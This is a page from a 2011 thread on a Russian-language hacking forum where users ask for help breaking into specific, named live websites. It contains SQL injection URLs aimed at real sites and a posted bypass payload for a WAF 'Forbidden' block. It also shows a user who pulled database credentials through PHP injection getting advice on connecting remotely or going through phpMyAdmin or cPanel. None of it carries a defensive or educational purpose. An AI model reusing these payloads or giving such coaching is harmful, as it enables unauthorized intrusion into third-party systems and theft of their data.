HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Перезагрузить страницу Ваши вопросы по уязвимостям.
   
Ответ
Страница 1736 из 2438 « Первая < 7361236163616861726 1732 1733 1734 1735 1736 1737 1738 1739 1740 1746178618362236 > Последняя »
 
Опции темы Поиск в этой теме Опции просмотра

  #17351  
Старый 20.06.2011, 14:48
kroŧ
Новичок
Регистрация: 19.05.2010
Сообщений: 6
Провел на форуме:
7830

Репутация: 4
По умолчанию
Как можно обойти такой фильтр?

http://www.onlymelbourne.com.au/melbourne.php?id=-371/*!UNioN*/SELeCT+1

просто переходит на:

http://www.onlymelbourne.com.au/melbourne.php

Заранее благодарю за любой ответ.
 
Ответить с цитированием

  #17352  
Старый 20.06.2011, 15:11
stasiliy
Новичок
Регистрация: 26.09.2009
Сообщений: 22
Провел на форуме:
44954

Репутация: 0
По умолчанию
Цитата:
Сообщение от kroŧ  
kroŧ said:
Как можно обойти такой фильтр?
http://www.onlymelbourne.com.au/melbourne.php?id=-371/*!UNioN*/SELeCT+1
просто переходит на:
http://www.onlymelbourne.com.au/melbourne.php
Заранее благодарю за любой ответ.
Я думаю никак.

Будет редирект всегда, там фильтры на слова ORDER, UNION,SELECT
 
Ответить с цитированием

  #17353  
Старый 20.06.2011, 16:07
GroM88
Познающий
Регистрация: 25.10.2007
Сообщений: 46
Провел на форуме:
318186

Репутация: 2
Отправить сообщение для GroM88 с помощью ICQ
По умолчанию
Подобрал колличество полей. Вылезло Forbidden

можно как то обойти?)

_http://philshopping.com/product_info.php?id=302+union+select+1,2,3,4,5,6,7 ,8,9,10,11,12,13--
 
Ответить с цитированием

  #17354  
Старый 20.06.2011, 16:23
freezed
Guest
Сообщений: n/a
Провел на форуме:
31258

Репутация: 7
По умолчанию
Цитата:
Сообщение от GroM88  
GroM88 said:
Подобрал колличество полей. Вылезло
Forbidden
можно как то обойти?)
_http://philshopping.com/product_info.php?id=302+union+select+1,2,3,4,5,6,7 ,8,9,10,11,12,13--
http://philshopping.com/product_info.php?id=302+and+1=0+union(select+1,2,3 ,4,5,6,7,8,9,10,11,12,13)+--+
 
Ответить с цитированием

  #17355  
Старый 20.06.2011, 17:24
stasiliy
Новичок
Регистрация: 26.09.2009
Сообщений: 22
Провел на форуме:
44954

Репутация: 0
По умолчанию
Через Php-injection вытащил dbconfig.php

$dbhost="localhost";

Пробую подключиться, вместо localhost пишу ip домена.

К базе подключаеться , а вот mysql_connect_db не работает

В чем может быть проблемма?

спасибо
 
Ответить с цитированием

  #17356  
Старый 20.06.2011, 17:41
Konqi
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094

Репутация: 672


Отправить сообщение для Konqi с помощью ICQ
По умолчанию
Цитата:
Сообщение от stasiliy  
stasiliy said:
Через Php-injection вытащил dbconfig.php
$dbhost="localhost";
Пробую подключиться, вместо localhost пишу ip домена.
К базе подключаеться , а вот mysql_connect_db не работает
В чем может быть проблемма?
спасибо
может mysql_select_db() ?
 
Ответить с цитированием

  #17357  
Старый 20.06.2011, 17:51
stasiliy
Новичок
Регистрация: 26.09.2009
Сообщений: 22
Провел на форуме:
44954

Репутация: 0
По умолчанию
Цитата:
Сообщение от Konqi  
Konqi said:
может mysql_select_db() ?
Да, просто ошшибку сделал когда вам писал.



вот что пишет

Цитата:
Сообщение от None  
Access denied for user 'user1_style_adm'@'%' to database 'user1_style'
 
Ответить с цитированием

  #17358  
Старый 20.06.2011, 17:53
Konqi
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094

Репутация: 672


Отправить сообщение для Konqi с помощью ICQ
По умолчанию
Цитата:
Сообщение от stasiliy  
stasiliy said:
Да, просто ошшибку сделал когда вам писал.


вот что пишет
http://google.ru/translate

нету доступа к этой базе
 
Ответить с цитированием

  #17359  
Старый 20.06.2011, 17:56
Nek1t
Участник форума
Регистрация: 07.03.2008
Сообщений: 141
Провел на форуме:
405538

Репутация: 23
По умолчанию
Не получается вывести определенное поле из таблицы MySQL. Причем поле довольно странное.

Цитата:
Сообщение от None  
SELECT count(field) FROM table
1234

Цитата:
Сообщение от None  
SELECT count(field) FROM table WHERE LENGTH(field)>0
1234

Цитата:
Сообщение от None  
SELECT LENGTH(field) FROM table LIMIT (1/10/1000),1
0

Пробовал AES_(EN/DE)CRYPT, HEX - на страницу ничего не выводится.
 
Ответить с цитированием

  #17360  
Старый 20.06.2011, 18:06
winstrool
Познающий
Регистрация: 06.03.2007
Сообщений: 59
Провел на форуме:
371875

Репутация: 137
По умолчанию
Цитата:
Сообщение от stasiliy  
stasiliy said:
Через Php-injection вытащил dbconfig.php
$dbhost="localhost";
Пробую подключиться, вместо localhost пишу ip домена.
К базе подключаеться , а вот mysql_connect_db не работает
В чем может быть проблемма?
спасибо
если пытаешься удоленно подключиться, то часто бывает что отключена функция удаленного в mysql, попробуй поискать phpmyadmin или cpanel, от туда и пытайся зайти...
 
Ответить с цитированием
Ответ
Страница 1736 из 2438 « Первая < 7361236163616861726 1732 1733 1734 1735 1736 1737 1738 1739 1740 1746178618362236 > Последняя »



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ